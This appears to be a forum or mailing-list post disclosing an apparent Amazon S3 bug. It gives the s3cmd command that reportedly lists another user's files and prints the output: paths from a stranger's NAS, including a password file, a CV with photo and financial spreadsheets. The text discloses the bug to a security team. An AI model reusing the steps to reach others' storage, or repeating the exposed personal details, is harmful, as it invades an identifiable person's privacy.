I'm not sure if this is the right channel, but I stumbled upon this while
trying to manage some of my own files. Although I didn't to get anything
further than a list, I'm guessing there's a lot more than could be done.

This is an Amazon S3 bucket exploit/bug.
Requirement:
Have an amazon s3 account (aws_access_key_id and aws_secret_access_key)

Tools needed:
http://s3tools.org/s3cmd (ruby based)

Once you have everything setup, run the following:
s3cmd.rb list 100

and you'll get the following:
DiskStation_01_001132038DBD/@tmp/@app/configbackup.dss
DiskStation_01_001132038DBD/Dokumente/!! PASSWORD DEPOT/Passwords Marc.psw
DiskStation_01_001132038DBD/Dokumente/!! SCAN/Thumbs.db
DiskStation_01_001132038DBD/Dokumente/!! SUZANA DOKUMENTENSAFE
!!/.~lock.Abfindung.xls#
DiskStation_01_001132038DBD/Dokumente/!! SUZANA DOKUMENTENSAFE
!!/.~lock.Einnahmen- Ausgaben.xls#
DiskStation_01_001132038DBD/Dokumente/!! SUZANA DOKUMENTENSAFE
!!/12_Bewerbung Suzana/Anlagenverzeichnis2.doc
DiskStation_01_001132038DBD/Dokumente/!! SUZANA DOKUMENTENSAFE
!!/12_Bewerbung Suzana/Anlagenverzeichnis2.pdf
DiskStation_01_001132038DBD/Dokumente/!! SUZANA DOKUMENTENSAFE
!!/12_Bewerbung Suzana/AnschreibenT?v-S?d Anwendungsorganisator Human
Resources.pdf
DiskStation_01_001132038DBD/Dokumente/!! SUZANA DOKUMENTENSAFE
!!/12_Bewerbung Suzana/Lebenslauf Suzana mit Foto.doc
DiskStation_01_001132038DBD/Dokumente/!! SUZANA DOKUMENTENSAFE
!!/12_Bewerbung Suzana/Lebenslauf Suzana mit Foto.pdf
DiskStation_01_001132038DBD/Dokumente/!! SUZANA DOKUMENTENSAFE
!!/12_Bewerbung Suzana/Scans/0599_001.pdf
DiskStation_01_001132038DBD/Dokumente/!! SUZANA DOKUMENTENSAFE
!!/12_Bewerbung Suzana/Scans/0599_002.pdf
DiskStation_01_001132038DBD/Dokumente/!! SUZANA DOKUMENTENSAFE
!!/12_Bewerbung Suzana/Scans/0599_003.pdf
DiskStation_01_001132038DBD/Dokumente/!! SUZANA DOKUMENTENSAFE
!!/12_Bewerbung Suzana/Scans/0599_004.pdf
....

I'm pretty sure none of those files aren't mine - A simple s3cmd.rb get,
which usually downloads a file, requires a bucket, which isn't listed above.
I'm sure there's a lot more that can be done with a bit more knowledge and
time. I figured I'd inform the security team to allow them to play with it
:)

-TeckniX